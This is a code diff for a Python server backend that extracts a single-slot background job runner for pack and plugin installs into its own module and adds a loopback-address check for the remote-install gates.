+++ b/backend/app/core/auth.py
@@ -39,10 +39,36 @@ from typing import Iterable
 
 from platformdirs import user_data_dir
 
+from ..config import settings
+
 logger = logging.getLogger(__name__)
 
 TOKEN_HEADER = "X-CodefyUI-Token"
 TOKEN_QUERY_PARAM = "token"  # WebSocket can't set custom headers from browser
+
+#: Bind addresses that mean "this machine only". ``0.0.0.0`` and ``::`` are
+#: deliberately absent: they are wildcards, reachable from the LAN, and a
+#: server on one of them is exactly the case the install gates exist for.
+LOOPBACK_HOSTS = frozenset({"127.0.0.1", "localhost", "::1"})
+
+
+def bound_to_loopback() -> bool:
+    """Is this server reachable only from the machine it runs on?
+
+    The question the two install gates ask before they let a request run a
+    package manager (``ALLOW_REMOTE_PACK_INSTALL``) or install a plugin whose
+    code this process will import (``ALLOW_REMOTE_PLUGIN_INSTALL``). It lives
+    here, beside the other "who is allowed to do this" rules, because it was
+    about to be the second copy of a five-line answer in a second router --
+    and two copies of a security default drift in the direction nobody
+    notices, which is open.
+
+    ``settings.HOST`` is read at CALL time so a test (and a reconfigured
+    server) sees the host it set, not the one that was in the file at import.
+    The brackets come off first: an IPv6 literal is written ``[::1]`` in a
+    bind address and ``::1`` in this set.
+    """
+    return settings.HOST.strip().strip("[]").lower() in LOOPBACK_HOSTS
 
 # We generate the token at import time. The server process keeps it in memory;
 # every restart rotates the token, which is the desired behaviour (no stale

--- a/backend/app/core/jobs.py
+++ b/backend/app/core/jobs.py
@@ -317,8 +317,8 @@ class JobRunner:
 
         Call it straight after :meth:`claim`, with no ``await`` in between:
         the generation the emitter closes over is read from ``self`` here,
-        and it is the one that claim installed only if nothing has claimed
-        the slot since.
+        and a claim that landed in between would have replaced it -- this
+        job's events would then wake the pollers parked on somebody else's.
 
         *on_settled* is called on the loop once the job is terminal, however
         it ended -- including the re-raised ``BaseException`` path. A domain
@@ -417,13 +417,14 @@ class JobRunner:
             job.current_step = None
 
     def finish(self, job: Job, status: str, event: dict) -> None:
-        """Finish a job the runner is not running: the public :meth:`_finish`.
+        """Record the terminal state of a job whose work is not ours to run.
 
-        For work that is not this process's to do -- an install that happens
-        after this server exits, in a helper it just started. The job is
-        claimed so that a client has the same thing to follow as for any
-        other (one id, one event stream, one terminal event saying what
-        happens next), and it is terminal from the moment it is made.
+        For an install that happens after this server exits, in a helper it
+        just started: there is no worker thread and no task, so nothing will
+        ever reach :meth:`_finish` for it on its own. The job is claimed
+        anyway, so that a client has the same thing to follow as for any
+        other -- one id, one event stream, one terminal event saying what
+        happens next -- and it is terminal from the moment it is made.
         """
         self._finish(job, status, event)
 

--- a/backend/app/core/jobs.py
+++ b/backend/app/core/jobs.py
@@ -1,0 +1,522 @@
+"""One job at a time, off the event loop, readable from anywhere.
+
+Installing a pack and installing a plugin are the same shape of problem: a
+synchronous function that blocks its thread for minutes, inside a server that
+has to keep answering while it runs. This module is the seam between the two,
+and it is deliberately the only one -- a second copy of these lock rules would
+drift from this one, and the drift would stay invisible until a client lost
+the last event of a job:
+
+* the work runs in ``asyncio.to_thread`` inside a background task, so the
+  loop is never blocked by pip or by a 470 MB download;
+* its ``emit`` callback is called from THAT thread, so every event is
+  appended under a ``threading.Lock`` and the loop is woken through
+  ``call_soon_threadsafe`` -- the same hand-off ``execution_context`` uses;
+* every stored event gets a ``cursor`` and a ``ts``, so a client that
+  reconnects (or opens a second tab) replays from where it left off rather
+  than from nothing.
+
+ONE JOB AT A TIME, deliberately. Every caller here mutates one shared thing --
+an interpreter's site-packages, a plugins directory -- and two concurrent
+writers to it end in a corrupt environment or a deadlock. A second claim is
+refused with the id of the job already running, which is what the UI needs to
+show "an install is already in progress" and offer to follow it.
+
+The finished job STAYS. The last thing a client asks for is the tail of a job
+that just ended -- the failure message, the final log lines -- so the job and
+its events live until the next claim replaces them.
+
+Terminal events are appended BEFORE the status flips, under the same lock, so
+a reader that sees ``status != "running"`` has already been given the event
+that says why. The other order loses the last event of every job to whoever
+polls at the wrong moment.
+
+What a job MEANS is not here. Which exception is a cancel and which is a
+failure, what an event's payload says, whether there is anything to run at
+all -- those belong to the domain, and they arrive as the ``terminal_for``
+callback and the ``work`` function. ``app.core.packs.service`` is the first
+caller; this module imports none of it, and must not.
+
+``run_service`` keeps its own, older fan-out for graph runs -- many runs at
+once, a sqlite store, per-run subscriber sets -- and is deliberately left
+alone. This is the single-slot runner; merging the two would be a redesign of
+both, and a redesign of the run queue is not what an install needs.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import logging
+import threading
+import time
+from collections import deque
+from collections.abc import Callable
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+
+log = logging.getLogger(__name__)
+
+#: Events kept for the current job. A pip run over a slow link emits a few
+#: hundred lines and a download a few hundred progress frames; four thousand
+#: holds a whole noisy install, and dropping the oldest is the right loss --
+#: a client that has fallen four thousand events behind is not reading them.
+MAX_EVENTS = 4000
+
+#: How long ``shutdown`` waits for a cancelled job to unwind before it stops
+#: waiting. The work checks for cancellation four times a second, so ten
+#: seconds is "something is stuck", not "this machine is slow" -- and the
+#: server has to come down either way.
+SHUTDOWN_TIMEOUT_S = 10.0
+
+#: The four states a job can end in, plus the one it starts in.
+STATUS_RUNNING = "running"
+STATUS_DONE = "done"
+STATUS_FAILED = "failed"
+STATUS_CANCELLED = "cancelled"
+STATUS_NEEDS_RESTART = "needs_restart"
+
+#: What the work is handed. ``emit`` buffers one event and wakes the pollers;
+#: ``cancel_check`` is the question the work asks between its own steps.
+Emit = Callable[[dict], None]
+CancelCheck = Callable[[], bool]
+
+#: The unit of work itself, run on a worker thread. It returns nothing: a job
+#: says how it went through its events and its status, not through a value.
+Work = Callable[[Emit, CancelCheck], None]
+
+#: How a domain reads an exception out of its own work: ``(status, event)``
+#: for an outcome it recognises, ``None`` for one it does not (see
+#: :meth:`JobRunner._run`).
+TerminalFor = Callable[[BaseException], tuple[str, dict] | None]
+
+
+class JobBusy(Exception):
+    """A job is already running. ``job_id`` is the one to follow.
+
+    *message* is there for a subclass that says the same thing in its own
+    domain's words ("a pack install is already running"): the id a client
+    has to follow is the part that must not vary, and the sentence around it
+    is the part that should.
+    """
+
+    def __init__(self, job_id: str, message: str | None = None):
+        self.job_id = job_id
+        super().__init__(message
+                         or f"a job is already running (job {job_id})")
+
+
+class UnknownJob(KeyError):
+    """No job with this id. Only the most recent job is kept."""
+
+
+class Broadcast:
+    """Edge-triggered wake-up for long pollers. No busy waiting anywhere.
+
+    Copied from ``app.core.run_service._Broadcast`` rather than imported: it
+    is private to that module, and a fifteen-line copy is cheaper than a
+    cross-module dependency on somebody else's internals.
+
+    ``asyncio.Event`` is level-triggered and single-shot; a shared one would
+    have to be cleared, and whoever clears it races everyone who has not
+    woken yet. Instead each ``notify`` SETS the current event and installs a
+    fresh one for the next generation. A waiter captures the event object
+    BEFORE it reads the buffer, so a notification that lands during that read
+    still wakes it -- the lost-wakeup window is closed by ordering, not by a
+    timeout.
+    """
+
+    __slots__ = ("_event",)
+
+    def __init__(self) -> None:
+        self._event = asyncio.Event()
+
+    def waiter(self) -> asyncio.Event:
+        """The generation to wait on. Capture it before reading the buffer."""
+        return self._event
+
+    def notify(self) -> None:
+        event, self._event = self._event, asyncio.Event()
+        event.set()
+
+
+@dataclass(kw_only=True)
+class Job:
+    """One unit of work, from claim to terminal event.
+
+    Keyword-only, and a subclass declares ``kw_only=True`` too: a job is made
+    in one place per domain and read everywhere, so the cost of naming the
+    fields at that one construction site buys a subclass the freedom to add
+    its own -- required ones included -- without having to interleave them
+    with the base's defaults.
+    """
+
+    job_id: str
+    status: str = STATUS_RUNNING
+    #: The work's current step name (``"pip"``, ``"download:<item>"``, ...),
+    #: which is how ``GET /api/packs`` knows which model is downloading.
+    current_step: str | None = None
+    created_at: float = field(default_factory=time.time)
+    finished_at: float | None = None
+    #: Set by ``cancel`` and read by the work's own ``cancel_check``. A
+    #: threading primitive because the work reads it from its worker thread.
+    cancel_event: threading.Event = field(default_factory=threading.Event)
+    error: dict | None = None
+
+    @property
+    def terminal(self) -> bool:
+        return self.status != STATUS_RUNNING
+
+
+def _now_iso() -> str:
+    """An ISO-8601 UTC timestamp, so two clients can order one job's log."""
+    return datetime.now(timezone.utc).isoformat()
+
+
+class JobRunner:
+    """The single job slot: one at a time, with a replayable event stream.
+
+    Holds the lock discipline and nothing else. What a job is FOR belongs to
+    whoever built the runner: it hands in ``terminal_for`` (what an exception
+    from its own work means) at construction and a ``work`` function per job.
+    """
+
+    def __init__(
+        self,
+        *,
+        terminal_for: TerminalFor,
+        label: str = "job",
+        max_events: int = MAX_EVENTS,
+        shutdown_timeout_s: float = SHUTDOWN_TIMEOUT_S,
+    ) -> None:
+        # What an exception out of the work did to the job. Injected because
+        # the runner must not know one domain's error classes from another's
+        # -- see :meth:`_run` for what a ``None`` answer means.
+        self._terminal_for = terminal_for
+        # What to call a job in the log. The runner's own two lines are about
+        # a job nobody is watching any more (a shutdown that timed out, a
+        # shutdown that caught something), so they have to say WHICH runner
+        # they came from -- there is more than one in this process.
+        self._label = label
+        self._shutdown_timeout_s = shutdown_timeout_s
+        # Guards the buffer, the cursor and every mutation of the current
+        # job's status. Held by both the loop and the work's worker thread,
+        # so it is a threading.Lock and never an asyncio one.
+        self._lock = threading.Lock()
+        self._job: Job | None = None
+        self._events: "deque[dict]" = deque(maxlen=max_events)
+        self._cursor = 0
+        self._task: "asyncio.Task | None" = None
+        self._broadcast = Broadcast()
+
+    # ── reading ───────────────────────────────────────────────────────────
+
+    def current_job(self) -> Job | None:
+        """The most recent job, running or not. None before the first claim."""
+        return self._job
+
+    def get_job(self, job_id: str) -> Job:
+        """The job with this id. Raises :class:`UnknownJob` for any other."""
+        job = self._job
+        if job is None or job.job_id != job_id:
+            raise UnknownJob(job_id)
+        return job
+
+    async def wait_for_events(
+        self,
+        job_id: str,
+        *,
+        after_cursor: int = 0,
+        limit: int = 500,
+        wait: float = 0.0,
+    ) -> tuple[list[dict], int, str]:
+        """Events after *after_cursor*, optionally long-polling for the next.
+
+        Returns ``(events, cursor, status)``. The cursor tracks what was
+        actually RETURNED, so an empty page never moves a follower forward
+        past events it did not receive.
+
+        Order is load-bearing: the wake-up generation is captured BEFORE the
+        buffer is read, so an event that lands during the read still
+        satisfies the wait instead of being missed until the next one.
+
+        Returns immediately -- possibly empty -- once the job is terminal. A
+        long poll on a finished job must never hang for its full timeout.
+        """
+        job = self.get_job(job_id)
+        waiter = self._broadcast.waiter()
+        events, cursor, status = self._read(job, after_cursor, limit)
+        if events or status != STATUS_RUNNING or wait <= 0:
+            return events, cursor, status
+
+        try:
+            await asyncio.wait_for(waiter.wait(), wait)
+        except asyncio.TimeoutError:
+            pass
+        return self._read(job, after_cursor, limit)
+
+    def _read(self, job: Job, after_cursor: int, limit: int
+              ) -> tuple[list[dict], int, str]:
+        """One consistent look at the buffer AND the job's status.
+
+        Both under the same lock hold, which is what makes "terminal status
+        implies the terminal event is already readable" true for a caller.
+
+        The identity check closes a narrow window in ``wait_for_events``: a
+        poll parked on a job that finishes, followed by a claim that clears
+        the buffer, would otherwise resume and hand the NEW job's events back
+        under the OLD job's id. There are no events for that job any more, so
+        the honest answer is the same one an id we never had gets.
+        """
+        with self._lock:
+            if self._job is not job:
+                raise UnknownJob(job.job_id)
+            page = [event for event in self._events
+                    if event["cursor"] > after_cursor][:limit]
+            status = job.status
+        return page, (page[-1]["cursor"] if page else after_cursor), status
+
+    # ── claiming and running ──────────────────────────────────────────────
+
+    def claim(self, job: Job, first_event: dict) -> None:
+        """Take the one job slot for *job*, or refuse with :class:`JobBusy`.
+
+        The check and the assignment happen with NO ``await`` between them --
+        they are one synchronous method for exactly that reason -- which is
+        the whole of what makes "one job at a time" true: two requests cannot
+        both pass the check before either takes the slot. A caller that wants
+        to refuse in its own vocabulary (``PackBusy``) checks earlier, before
+        it has resolved anything; this is the check that actually hands over
+        the slot.
+
+        *first_event* is stored as cursor 1 under the same lock hold, so it
+        is in the buffer before the work can emit anything and a client that
+        polls from cursor 0 always sees it first.
+
+        The previous job's task is dropped here as well. Leaving a finished
+        one in place would have ``shutdown`` await something that belongs to
+        a job nobody can read any more -- and a job that is terminal on
+        arrival, because its work happens in another process, never gets a
+        task of its own at all.
+        """
+        running = self._job
+        if running is not None and not running.terminal:
+            raise JobBusy(running.job_id)
+
+        broadcast = Broadcast()
+        with self._lock:
+            self._job = job
+            self._events.clear()
+            self._cursor = 0
+            self._broadcast = broadcast
+            self._task = None
+            self._store(first_event, job)
+
+    def start(self, job: Job, work: Work, *,
+              on_settled: Callable[[], None] | None = None) -> asyncio.Task:
+        """Run *work* on a worker thread, in a task that records how it ended.
+
+        Call it straight after :meth:`claim`, with no ``await`` in between:
+        the generation the emitter closes over is read from ``self`` here,
+        and it is the one that claim installed only if nothing has claimed
+        the slot since.
+
+        *on_settled* is called on the loop once the job is terminal, however
+        it ended -- including the re-raised ``BaseException`` path. A domain
+        that has caches to drop after a job (the disk is not what it was)
+        drops them there.
+        """
+        loop = asyncio.get_running_loop()
+        self._task = asyncio.create_task(
+            self._run(job, work, loop, self._broadcast, on_settled))
+        return self._task
+
+    async def _run(self, job: Job, work: Work,
+                   loop: asyncio.AbstractEventLoop, broadcast: Broadcast,
+                   on_settled: Callable[[], None] | None) -> None:
+        """Run the work on a worker thread and record how it ended.
+
+        Swallows every exception ``terminal_for`` recognises: this is a bare
+        task nobody awaits except ``shutdown``, and an escaping one would be
+        reported as "task exception was never retrieved" long after the job
+        disappeared from the UI.
+
+        Anything ``terminal_for`` does NOT recognise -- it answers ``None``,
+        which for every domain so far means a ``BaseException``:
+        KeyboardInterrupt, SystemExit, CancelledError -- is recorded as
+        failed and then RE-RAISED. Those are not ours to swallow, and the job
+        reaches a terminal state either way, which is the part that matters
+        to anyone still watching it. A job left saying "running" forever is
+        worse than one that says why it stopped: the panel would offer a Stop
+        button for a thread that no longer exists, and no claim would ever be
+        accepted again.
+
+        ``terminal_for`` is called from inside the ``except`` block, so it
+        may use ``log.exception`` and it sees the live exception context.
+        """
+        emit = self._emitter(job, loop, broadcast)
+        try:
+            await asyncio.to_thread(work, emit, job.cancel_event.is_set)
+        except BaseException as exc:
+            outcome = self._terminal_for(exc)
+            if outcome is None:
+                self._fail(job, repr(exc), None)
+                raise
+            self._finish(job, *outcome)
+        else:
+            self._finish(job, STATUS_DONE, {"type": "job_done"})
+        finally:
+            if on_settled is not None:
+                on_settled()
+
+    def _emitter(self, job: Job, loop: asyncio.AbstractEventLoop,
+                 broadcast: Broadcast) -> Emit:
+        """The ``emit`` the work is handed. Called from the worker thread.
+
+        Closes over the JOB as well as its generation's loop and broadcast,
+        so an event says which job produced it. A closure is the only thing
+        that can: the caller is a reader thread that may outlive the job --
+        ``packs.runner._pump`` is a daemon thread joined with a timeout --
+        and by the time its event reaches ``_store`` the runner's idea of the
+        current job may already be somebody else's.
+        """
+
+        def emit(event: dict) -> None:
+            with self._lock:
+                self._store(event, job)
+            try:
+                loop.call_soon_threadsafe(broadcast.notify)
+            except RuntimeError:
+                # The loop is closed (the server is going down, or a test
+                # ended while the thread was still unwinding). Nobody is left
+                # to wake; the event is stored either way.
+                pass
+
+        return emit
+
+    def _store(self, event: dict, job: Job | None) -> None:
+        """Stamp *event* and buffer it. CALLER HOLDS ``self._lock``.
+
+        *job* is the job that PRODUCED the event, which is not always the
+        current one: a finished job's reader thread can still be emitting.
+        Buffering is unconditional -- the buffer belongs to whatever job is
+        current, and a stray line in it is visible and harmless -- but the
+        step bookkeeping is not. ``current_step`` is what
+        ``GET /api/packs`` turns into an item's "downloading" badge, so a
+        late event stamping it on the next job would put that badge on an
+        item of a pack the old job never touched.
+        """
+        self._cursor += 1
+        self._events.append({**event, "cursor": self._cursor, "ts": _now_iso()})
+
+        if job is None or job is not self._job:
+            return
+        kind = event.get("type")
+        if kind == "step_started":
+            job.current_step = event.get("step")
+        elif kind == "step_done" and job.current_step == event.get("step"):
+            job.current_step = None
+
+    def finish(self, job: Job, status: str, event: dict) -> None:
+        """Finish a job the runner is not running: the public :meth:`_finish`.
+
+        For work that is not this process's to do -- an install that happens
+        after this server exits, in a helper it just started. The job is
+        claimed so that a client has the same thing to follow as for any
+        other (one id, one event stream, one terminal event saying what
+        happens next), and it is terminal from the moment it is made.
+        """
+        self._finish(job, status, event)
+
+    def _finish(self, job: Job, status: str, event: dict) -> None:
+        """Record the terminal event and the status, atomically.
+
+        The event goes in FIRST and the status flips under the same lock, so
+        a poller that sees a terminal status has already been handed the
+        event explaining it.
+
+        Called from ``_run``, which runs ON the loop, so the wake-up needs no
+        thread hand-off. ``self._broadcast`` is still this job's generation:
+        only a claim replaces it, and a claim is refused until the current
+        job is terminal -- which is what this method is about to make true.
+
+        The other caller is :meth:`finish`, where that argument runs the
+        other way round and still holds: the generation was replaced by the
+        claim itself, moments earlier and under the same lock, and that job
+        was terminal on arrival. It has no ``_run`` and no worker thread, so
+        this is the only place its status is ever set.
+
+        A FAILED job also gets its ``error``, read out of the event it was
+        given. "Why did it fail" is asked of the job (the panel's summary)
+        and of the event stream (the log), and two writers for one answer is
+        how they come to disagree -- so a terminal event with
+        ``STATUS_FAILED`` carries ``message`` and ``hint``, and the job's
+        copy is made from it, here, under the lock that publishes both.
+        """
+        with self._lock:
+            self._store(event, job)
+            if status == STATUS_FAILED:
+                job.error = {"message": event.get("message"),
+                             "hint": event.get("hint")}
+            job.status = status
+            job.finished_at = time.time()
+        self._broadcast.notify()
+
+    def _fail(self, job: Job, message: str, hint: str | None) -> None:
+        """Finish *job* as failed, with the runner's own ``job_failed`` event.
+
+        The shape every domain's failure uses, so that a client which can
+        render one runner's failure can render the other's.
+        """
+        self._finish(job, STATUS_FAILED,
+                     {"type": "job_failed", "message": message, "hint": hint})
+
+    # ── stopping ──────────────────────────────────────────────────────────
+
+    async def cancel(self, job_id: str) -> bool:
+        """Ask the job to stop. False when it had already finished.
+
+        Cooperative: the work notices between its own steps, and it is the
+        WORK that ends the job, so the status may still say running when this
+        returns. Asking twice is not an error.
+        """
+        job = self.get_job(job_id)
+        if job.terminal:
+            return False
+        job.cancel_event.set()
+        return True
+
+    async def shutdown(self) -> None:
+        """Stop a running job and wait for it, bounded.
+
+        Bounded because the server is coming down either way: work that
+        ignores its cancel check must not be able to hold the process open.
+        The task is SHIELDED from the timeout -- cancelling it would not stop
+        the worker thread anyway, and would leave the job with no terminal
+        event at all.
+
+        Nothing the awaited task raises escapes. ``_run`` swallows every
+        exception the domain claims but deliberately RE-RAISES the ones it
+        does not (KeyboardInterrupt, SystemExit, CancelledError) after
+        recording the job, and this is the one place that await happens --
+        inside the lifespan shutdown hook. Letting one through would turn
+        "the server is coming down" into a traceback on the way out, of a job
+        that has already reached a terminal state and told everyone watching.
+        """
+        job, task = self._job, self._task
+        if job is not None and not job.terminal:
+            job.cancel_event.set()
+        if task is None or task.done():
+            return
+        try:
+            await asyncio.wait_for(asyncio.shield(task),
+                                   self._shutdown_timeout_s)
+        except asyncio.TimeoutError:
+            log.warning("%s did not stop within %.0fs; "
+                        "leaving it to the interpreter",
+                        self._label, self._shutdown_timeout_s)
+        except BaseException:
+            # BaseException, not Exception: _run re-raises what terminal_for
+            # does not claim on purpose (see the docstring), so
+            # ``except Exception`` here catches only the cases _run already
+            # handled and misses the ones it forwards.
+            log.exception("%s failed during shutdown", self._label)

--- a/backend/app/core/packs/runner.py
+++ b/backend/app/core/packs/runner.py
@@ -208,6 +208,11 @@ def _stop_process(proc) -> None:
         proc.kill()
 
 
+#: The public name for it: ending a child process the way the OS requires is
+#: shared by every subprocess the app starts, not only by pip.
+stop_process = _stop_process
+
+
 def _close_output(proc) -> None:
     """Shut the pipe the reader thread is holding.
 

--- a/backend/app/core/packs/service.py
+++ b/backend/app/core/packs/service.py
@@ -500,8 +500,8 @@ class PackService:
 
         ``None`` means "not one of ours": KeyboardInterrupt, SystemExit,
         CancelledError. The runner records the job as failed and re-raises
-        it, which is what those deserve; the warning is logged here because
-        this is what knows what to call the job.
+        it, which is what those deserve; the warning is logged here rather
+        than in the runner, because this is where a job has a name.
         """
         job = self.current_job()
         if isinstance(exc, PackCancelled):

--- a/backend/app/core/packs/service.py
+++ b/backend/app/core/packs/service.py
@@ -1,23 +1,20 @@
 """One pack install at a time, off the event loop, readable from anywhere.
 
 ``flows.install_pack_live`` is synchronous and blocks its thread for minutes.
-This module is the seam between that and an HTTP server that must keep
-answering while it runs:
+``app.core.jobs.JobRunner`` is the seam between that and an HTTP server that
+must keep answering while it runs: the worker thread, the lock rules, the
+cursor, the ring buffer and the long poll are all its, and the reasoning
+behind each of them is in that module.
 
-* the flow runs in ``asyncio.to_thread`` inside a background task, so the
-  loop is never blocked by pip or by a 470 MB download;
-* its ``emit`` callback is called from THAT thread, so every event is
-  appended under a ``threading.Lock`` and the loop is woken through
-  ``call_soon_threadsafe`` -- the same hand-off ``execution_context`` uses;
-* every stored event gets a ``cursor`` and a ``ts``, so a client that
-  reconnects (or opens a second tab) replays from where it left off rather
-  than from nothing.
+What is HERE is everything the runner deliberately does not know: which packs
+may be installed at all, what the failure shapes of ``packs.errors`` mean for
+a job (``_terminal_for``), and the restart handshake below.
 
-ONE JOB AT A TIME, deliberately. Two concurrent ``uv pip install`` runs share
-one site-packages and one cache lock, and the honest outcomes are a corrupt
-environment or a deadlock. A second submit is refused with the id of the job
-already running, which is what the UI needs to show "an install is already
-in progress" and offer to follow it.
+ONE INSTALL AT A TIME, deliberately. Two concurrent ``uv pip install`` runs
+share one site-packages and one cache lock, and the honest outcomes are a
+corrupt environment or a deadlock. A second submit is refused with the id of
+the job already running, which is what the UI needs to show "an install is
+already in progress" and offer to follow it.
 
 A RESTART-MODE install has no flow and no thread at all. It cannot run inside
 this process -- it would replace packages this process has already imported --
@@ -28,28 +25,35 @@ follow as for a live install: one id, one event stream, one terminal event
 saying what happens next. What it follows afterwards is the server coming
 back.
 
-The finished job STAYS. The last thing a client asks for is the tail of a job
-that just ended -- the failure message, the final log lines -- so the job and
-its events live until the next submit replaces them.
-
-Terminal events are appended BEFORE the status flips, under the same lock, so
-a reader that sees ``status != "running"`` has already been given the event
-that says why. The other order loses the last event of every job to whoever
-polls at the wrong moment.
+The finished job STAYS -- the last thing a client asks for is the tail of a
+job that has just ended -- and every terminal event is readable before the
+status that explains it flips. Both are the runner's doing.
 """
 
 from __future__ import annotations
 
 import asyncio
 import logging
-import threading
-import time
 import uuid
-from collections import deque
 from collections.abc import Callable, Sequence
-from dataclasses import dataclass, field
-from datetime import datetime, timezone
+from dataclasses import dataclass
 
+from ..jobs import (
+    MAX_EVENTS,
+    SHUTDOWN_TIMEOUT_S,
+    STATUS_CANCELLED,
+    STATUS_DONE,
+    STATUS_FAILED,
+    STATUS_NEEDS_RESTART,
+    STATUS_RUNNING,
+    CancelCheck,
+    Emit,
+    Job,
+    JobBusy,
+    JobRunner,
+    UnknownJob,
+    Work,
+)
 from . import download, flows, restart, state
 from .catalog import GPU_TORCH_PACK_ID, ModelItem, Pack, get_item
 from .errors import (
@@ -62,36 +66,38 @@ from .errors import (
 
 log = logging.getLogger(__name__)
 
-#: Events kept for the current job. A pip run over a slow link emits a few
-#: hundred lines and a download a few hundred progress frames; four thousand
-#: holds a whole noisy install, and dropping the oldest is the right loss --
-#: a client that has fallen four thousand events behind is not reading them.
-MAX_EVENTS = 4000
+#: This module's public surface, spelled out because half of it is imported
+#: from ``app.core.jobs`` and re-exported. ``routes_packs``, the CLI and the
+#: tests have always read these names from here, and moving the runner out
+#: must not move them: a linter that cannot see a re-export would report the
+#: imports above as unused, and deleting them would be an API break.
+__all__ = [
+    "MAX_EVENTS",
+    "SHUTDOWN_TIMEOUT_S",
+    "STATUS_CANCELLED",
+    "STATUS_DONE",
+    "STATUS_FAILED",
+    "STATUS_NEEDS_RESTART",
+    "STATUS_RUNNING",
+    "PackBusy",
+    "PackJob",
+    "PackService",
+    "RestartUnavailable",
+    "UnknownJob",
+]
 
-#: How long ``shutdown`` waits for a cancelled job to unwind before it stops
-#: waiting. The flow checks for cancellation four times a second, so ten
-#: seconds is "something is stuck", not "this machine is slow" -- and the
-#: server has to come down either way.
-SHUTDOWN_TIMEOUT_S = 10.0
 
-#: The four states a job can end in, plus the one it starts in.
-STATUS_RUNNING = "running"
-STATUS_DONE = "done"
-STATUS_FAILED = "failed"
-STATUS_CANCELLED = "cancelled"
-STATUS_NEEDS_RESTART = "needs_restart"
+class PackBusy(JobBusy):
+    """An install is already running. ``job_id`` is the one to follow.
 
-
-class PackBusy(Exception):
-    """An install is already running. ``job_id`` is the one to follow."""
+    A :class:`~app.core.jobs.JobBusy` with the installer's wording: the
+    runner refuses a second claim in its own generic terms, and this is what
+    that refusal is called when the job is a pack install.
+    """
 
     def __init__(self, job_id: str):
-        self.job_id = job_id
-        super().__init__(f"a pack install is already running (job {job_id})")
-
-
-class UnknownJob(KeyError):
-    """No job with this id. Only the most recent job is kept."""
+        super().__init__(
+            job_id, f"a pack install is already running (job {job_id})")
 
 
 class RestartUnavailable(Exception):
@@ -102,66 +108,16 @@ class RestartUnavailable(Exception):
         super().__init__(message)
 
 
-class _Broadcast:
-    """Edge-triggered wake-up for long pollers. No busy waiting anywhere.
-
-    Copied from ``app.core.run_service._Broadcast`` rather than imported: it
-    is private to that module, and a fifteen-line copy is cheaper than a
-    cross-module dependency on somebody else's internals.
-
-    ``asyncio.Event`` is level-triggered and single-shot; a shared one would
-    have to be cleared, and whoever clears it races everyone who has not
-    woken yet. Instead each ``notify`` SETS the current event and installs a
-    fresh one for the next generation. A waiter captures the event object
-    BEFORE it reads the buffer, so a notification that lands during that read
-    still wakes it -- the lost-wakeup window is closed by ordering, not by a
-    timeout.
-    """
-
-    __slots__ = ("_event",)
-
-    def __init__(self) -> None:
-        self._event = asyncio.Event()
-
-    def waiter(self) -> asyncio.Event:
-        """The generation to wait on. Capture it before reading the buffer."""
-        return self._event
-
-    def notify(self) -> None:
-        event, self._event = self._event, asyncio.Event()
-        event.set()
-
-
-@dataclass
-class PackJob:
+@dataclass(kw_only=True)
+class PackJob(Job):
     """One install, from submit to terminal event."""
 
-    job_id: str
     pack_id: str
     #: The items this job will fetch, resolved at submit time (see
     #: ``PackService._targets``) -- never the caller's ``None``.
     items: tuple[str, ...]
     mode: str
-    status: str = STATUS_RUNNING
-    #: The flow's current step name (``"pip"``, ``"download:<item>"``, ...),
-    #: which is how ``GET /api/packs`` knows which model is downloading.
-    current_step: str | None = None
-    created_at: float = field(default_factory=time.time)
-    finished_at: float | None = None
-    #: Set by ``cancel`` and read by the flow's own ``cancel_check``. A
-    #: threading primitive because the flow reads it from its worker thread.
-    cancel_event: threading.Event = field(default_factory=threading.Event)
-    error: dict | None = None
     restart_command: str | None = None
-
-    @property
-    def terminal(self) -> bool:
-        return self.status != STATUS_RUNNING
-
-
-def _now_iso() -> str:
-    """An ISO-8601 UTC timestamp, so two clients can order one job's log."""
-    return datetime.now(timezone.utc).isoformat()
 
 
 class PackService:
@@ -188,29 +144,35 @@ class PackService:
         # whose run service has not been built yet.
         self._runs_active = runs_active if runs_active is not None else (
             lambda: False)
-        self._shutdown_timeout_s = shutdown_timeout_s
-        # Guards the buffer, the cursor and every mutation of the current
-        # job's status. Held by both the loop and the flow's worker thread,
-        # so it is a threading.Lock and never an asyncio one.
-        self._lock = threading.Lock()
-        self._job: PackJob | None = None
-        self._events: "deque[dict]" = deque(maxlen=MAX_EVENTS)
-        self._cursor = 0
-        self._task: "asyncio.Task | None" = None
-        self._broadcast = _Broadcast()
+        # The single job slot: the lock, the buffer, the cursor, the long
+        # poll and the worker task. ``_terminal_for`` is the seam back --
+        # the runner asks it what an exception out of the flow did to the
+        # job, because knowing that is this module's business and not its.
+        self._runner = JobRunner(terminal_for=self._terminal_for,
+                                 label="pack install job",
+                                 shutdown_timeout_s=shutdown_timeout_s)
+
+    @property
+    def _task(self) -> "asyncio.Task | None":
+        """The worker task of the current job, or None when it has none.
+
+        The restart-mode path never starts one, and a claim drops the
+        previous job's. Exposed because ``shutdown`` used to own it here and
+        the service's tests still read it.
+        """
+        return self._runner._task
 
     # ── reading ───────────────────────────────────────────────────────────
 
     def current_job(self) -> PackJob | None:
         """The most recent job, running or not. None before the first submit."""
-        return self._job
+        # Every job the runner has ever held was made by this class, so
+        # every one of them is a PackJob.
+        return self._runner.current_job()
 
     def get_job(self, job_id: str) -> PackJob:
         """The job with this id. Raises :class:`UnknownJob` for any other."""
-        job = self._job
-        if job is None or job.job_id != job_id:
-            raise UnknownJob(job_id)
-        return job
+        return self._runner.get_job(job_id)
 
     async def wait_for_events(
         self,
@@ -222,49 +184,22 @@ class PackService:
     ) -> tuple[list[dict], int, str]:
         """Events after *after_cursor*, optionally long-polling for the next.
 
-        Returns ``(events, cursor, status)``. The cursor tracks what was
-        actually RETURNED, so an empty page never moves a follower forward
-        past events it did not receive.
-
-        Order is load-bearing: the wake-up generation is captured BEFORE the
-        buffer is read, so an event that lands during the read still
-        satisfies the wait instead of being missed until the next one.
-
-        Returns immediately -- possibly empty -- once the job is terminal. A
-        long poll on a finished job must never hang for its full timeout.
+        Returns ``(events, cursor, status)``. The cursor rules and the
+        lost-wakeup ordering that make the long poll safe belong to
+        :meth:`app.core.jobs.JobRunner.wait_for_events`.
         """
-        job = self.get_job(job_id)
-        waiter = self._broadcast.waiter()
-        events, cursor, status = self._read(job, after_cursor, limit)
-        if events or status != STATUS_RUNNING or wait <= 0:
-            return events, cursor, status
-
-        try:
-            await asyncio.wait_for(waiter.wait(), wait)
-        except asyncio.TimeoutError:
-            pass
-        return self._read(job, after_cursor, limit)
+        return await self._runner.wait_for_events(
+            job_id, after_cursor=after_cursor, limit=limit, wait=wait)
 
